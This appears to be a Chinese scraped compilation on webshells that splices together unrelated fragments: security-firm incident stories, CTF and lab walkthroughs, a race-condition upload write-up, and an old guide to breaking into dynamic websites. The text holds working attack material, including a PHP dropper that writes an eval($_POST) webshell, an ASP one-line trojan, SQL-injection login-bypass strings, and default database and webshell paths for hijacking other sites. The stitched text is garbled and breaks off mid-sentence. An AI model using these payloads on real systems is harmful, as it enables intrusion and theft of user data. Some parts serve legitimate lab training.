webshell

APP渗透测试目前包含了Android端+IOS端的漏洞检测与安全测试，前段时间某金融客户的APP被黑客恶意攻击，导致APP里的用户数据包括平台里的账号，密码，手机号，姓名都被信息泄露，通过老客户的介绍找到我们SINE安全公司寻求安全防护上的技术支持，防止后期APP被攻击以及数据篡改泄露等安全问题的发生。针对于客户发生的网站被黑客攻击以及用户资料泄露的情况，我们立即成立了SINE安全移动端APP应急响应小组，关于APP渗透测试的内容以及如何解决的问题我们做了汇总，通过这篇文章来分享给大家。 首先要了解客户的情况，知彼知己百战不殆，客户APP架构开发是Web（php语言）+VUE框架，服务器采用的是Linux centos系统，数据库与WEB APP端分离，通过内网进行传输，大部分金融以及虚拟币客户都是采用此架构，有的是RDS数据库，也基本都是内网传输，杜绝与前端的连接，防止数据被盗，但是如果前端服务器（APP）存在漏洞导致被黑客攻击，那么攻击者很有可能利用该服务器的权限去远程连接数据库端，导致数据泄露，用户信息被盗取的可能。 然后对客户服务器里的APP代码，以及网站PHP源文件进行代码的安全审计，以及网站木马文件的检测与清除，包括网站漏洞测试与挖掘，我们SINE安全都是人工进行代码的安全审计与木马检查，下载了客户代码到本地电脑里进行操作，包括了APP的网站访问日志

很对客户网站以及服务器被攻击，被黑后，留下了很多webshell文件，也叫网站木马文件，客户对自己网站的安全也是很担忧，担心网站后期会继续被攻击篡改，毕竟没有专业的安全技术去负责网站的安全防护工作，通过老客户的介绍很多客户在遇到网站被攻击后找到我们SINE安全做网站的安全服务，防止恶意攻击与篡改。对网站进行全面的防御与加固，我们在对客户网站进行安全部署的同时，客户经常会想要了解到底网站，以及服务器是如何被入侵，攻击者的IP是谁，那么我们SINESAFE技术针对这种情况，最好的办法就是通过日志进行分析，溯源追踪，帮助客户找到网站漏洞根源，到底是谁在攻击他们。下面我们来分享一下，我们是如何对日志进行分析与追查的。 首先客户的网站以及服务器系统都有开启日志访问功能，网站的话有IIS，NGINX，APACHE的访问日志记录功能，通过对日志文件进行全面的人工安全分析审计，来溯源网站被攻击的根源以及攻击者的IP，我们SINE安全技术在日常对几百兆可能上G大小的日志进行分析查看的时候，也是很难受，那么多的日志记录在搜索特定的特征词的时候，日志就卡了，卡顿最起码要几分钟，很耽误事，经过十几年的日志审计积累下来的经验，我们总结了一套自己的日志分析方法与脚本。 首先对日志的关键词搜索功能进行总结，使用关键词搜索日志起到的作用是可以快速的查找到网站攻击者的痕迹

1.view_source 2.robots 3.backup 4.cookie 5.disabled_button 6.weak_auth 7.simple_php 8.get_post 9.xff_referer 10.webshell 11.command_excution 12.simple_js 1.view_source ctrl+u查看源代码 出现以下界面： 得到flag。 2.robots 首先了解一下robots.txt的概念： robots是网站跟爬虫间的协议，用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限，也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。 也就是说robots.txt中存在的文件名是我们作为用户不能访问的文件。而我们为了寻找flag，则就是遇见凡是不能访问的就去访问。 构建路径：在地址栏后写入/robots.txt,得到不允许访问的界面的文件名。 访问：/f1ag_1s_h3re.php 得到flag。 3.backup 首先普及一个关于备份文件的概念： 文本编辑器和代码编辑器通常对正在编辑的文件会事先产生一个备份文件，这样做的目的是让出问题后可以恢复文件。这类备份文件通常和原文件在同一个目录下，而且文件的命名也和原文件类似。 例如：对一个名为index.php的文件进行编辑，自动创建的备份文件将会被命名成

竞争条件攻击属于文件上传漏洞的一种。 一些网站上传文件的逻辑是先允许上传文件，再检测文件中是否包含webshell的脚本，如果存在则删除webshell文件。 但是攻击者可以利用上传文件和删除文件的时间差来完成文件上传漏洞攻击。 攻击者可以上传类似代码hacker.php： <?php foputs(fopen('../shell.php','w'),'<?php @eval($_POST[a]) ?>'); ?> 访问文件时，文件代码会执行，在hacker.php文件所在目录下新建一个shell.php，内容即: <?php @eval($_POST[a]) ?> 旧的webshell文件本来就只是一个垫脚石的存在，删不删除无所谓，我们利用新建的webshell文件可以进行漏洞攻击 竞争条件攻击只试用于绕过后端的检测，对于绕过前端代码检测方法是没有用的。 如果攻击者能讲两者很好得结合起来，说不定会有成效。 来源： https://www.cnblogs.com/echoDetected/p/12296235.html

首先，观察指定网站。 入侵指定网站是需要条件的： 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵：我认为必须是动态的网站 如ASP、 PHP 、 JSP等代码编写的站点 如果是静态的（.htm或html）,一般是不会成功的。 如果要入侵的目标网站是动态的，就可以利用动态网站的漏洞进行入侵。 Quote: 以下是入侵网站常用方法： 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.　 2.注入漏洞 字符过滤不严造成的 3.暴库:把二级目录中间的/换成%5c　 　 　 4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有： 　’or’’=’　\" or \"a\"=\"a　　 ’) or (’a’=’a　　 \") or (\"a\"=\"a　　or 1=1--　 ’ or ’a’=’a 5.社会工程学。这个我们都知道吧。就是猜解。 　 6.写入ASP格式 数据库 。就是一句话木马〈%execute request(\"value\")%〉 （数据库必需得是ASP或ASA的后缀） 　　 7.源码利用：一些网站用的都是网上下载的源码.有的站长很懒

漏洞排查思路： 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN、中国菜刀上传.　 2.注入漏洞 字符过滤不严造成的 3.暴库:把二级目录中间的/换成%5c　 　 4.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。 我收集了一下。类似的还有： 　'or''=' 　" or "a"="a　　 ') or ('a'='a　　 ") or ("a"="a　　 or 1=1--　 ' or 'a'='a 5.社会工程学。这个我们都知道吧。就是猜解。 　 6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 （数据库必需得是ASP或ASA的后缀） 　　 7.源码利用：一些网站用的都是网上下载的源码.有的站长很懒.什么也不改. 比如：默认数据库，默认后台地址，默认管理员帐号密码等 8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy

墨者靶场 入门：WebShell文件上传漏洞分析溯源 第1题 题目 背景介绍 实训目标 解题方向 解题步骤 题目 背景介绍 某公司内部资料分享平台存在一个文件上传页面，为了保证服务器的安全，现在安全工程师“墨者”将对该上传页面进行安全检测，看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识； 2、了解PHP上传绕过扩展名的方法； 3、了解Burpsuite的使用方法。 解题方向 根据页面提示进行文件上传，修改数据包进行上传测试。 解题步骤 启动靶机，访问链接，是个文件上传页面。 那我们第一想的就是上传shell文件，可是网页对文件名进行过滤，php文件是上传不了的，那我们可以通过修改大小写或者使用拓展名进行绕过。 x.php - > x.phP x.php - > x.php5 上传修改好的shell文件。 上传成功，使用菜刀去连一下，寻找key文件。 提交key值即可。 来源： CSDN 作者： CN_wanku 链接： https://blog.csdn.net/qq_43233085/article/details/103988816

环境 Kali ip 192.168.56.102 Smb 靶机 ip 192.168.56.103 靶场下载: 链接：https://pan.baidu.com/s/1OwNjBf7ZEGmFlRq79bkD_A 提取码：0eg6 信息探测 使用 netdiscover -r ip/mask 进行内网网段存活 ip 探测 靶机为103 进行 nmap 端口探测和服务信息探测 nmap -sV -T4 -A 192.168.56.103 可以看到smb 服务 针对 SMB 协议，使用空口令，若口令尝试登陆，并查看敏感文件，下载查看 0x01 针对于开放服务进行弱口令尝试 smbclient -L 192.168.56.103 连接成功 分别查看三个共享连接是否有 flag 等敏感文件 smbclient ‘ \\IP\$share ’ 查看文件 尝试到share$ 连接时 发现可以空口令连接 查看文件 Robots.txt 里的目录 每个查看后无果 查看 deets.txt 发现一个密码为 12345 然后继续查看敏感文件 Cd 到 wordpress 目录 发现敏感文件 wp-config.php 读取到数据密码 尝试用数据库密码和 12345 登录到 Mysql ssh 均失败 0x02 针对于开放服务器的版本 尝试溢出漏洞 尝试 searchsploit samba 版本号

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 自定义URL Protocol 协议 一些应用软件可以在浏览器中点击一个url后自动启动，并执行操作。这是咋实现的呢？ 我在 google了许多也找个博客说明。接照这些文档我也新手试了一下。 通过网站调用可执行程序，主要是修改注册表,注册 URL Protocol 协议。 第一步：按照如下图所示建立注册表 其中 在注册表的 [HKEY_CLASSES_ROOT] 主键下 建立[qiaoker]建。 [qiaoker] 此键可以自定义任意。 第二步：注册表中建立相关键值对。 注意到上面 command 项的值为 C:\Program Files (x86)\Qiaoker\updater.exe "%1" ,这个"%1"是传递给 updater.exe的参数。 使用时我们会在后面讲到如何使。 第三步：编写测试页面 <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 2020年刚开始，苹果CMS被爆出数据库代码执行漏洞，大量的电影网站被挂马，尤其电影的页面被篡改植入了恶意代码，数据库中的VOD表里的d_name被全部修改，导致网站打开后直接跳转到S站或者弹窗广告，目前该maccms漏洞受影响的苹果系统版本是V8,V10，很多客户网站被反复篡改，很无奈，通过朋友介绍找到我们SINE安全寻求技术上支持，防止网站被挂马。根据客户的反应，服务器采用的是linux centos系统，苹果CMS版本是最新的V10版本，我们立即成立网站安全应急响应处理，帮助客户解决网站被攻击的问题。 首先很多站长以为升级了苹果CMS官方最新的漏洞补丁就没问题了，通过我们SINE安全技术对补丁的代码安全分析发现，该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的，于事无补，网站还会继续被攻击。 我们来看下客户网站目前发生的挂马问题，打开网站首页以及各个电影地址都会被插入挂马代码，如下图所示： 打包压缩了一份网站源代码，以及nginx网站日志文件，我们SINE安全工程师在根目录下发现被上传了网站webshell木马文件，通过网站日志溯源追踪我们查看到访问这个PHP脚本木马文件的是一个韩国的IP，具体的代码如下图： 代码做了加密处理，我们SINE安全对其解密发现该代码的功能可以对网站进行上传，下载，修改代码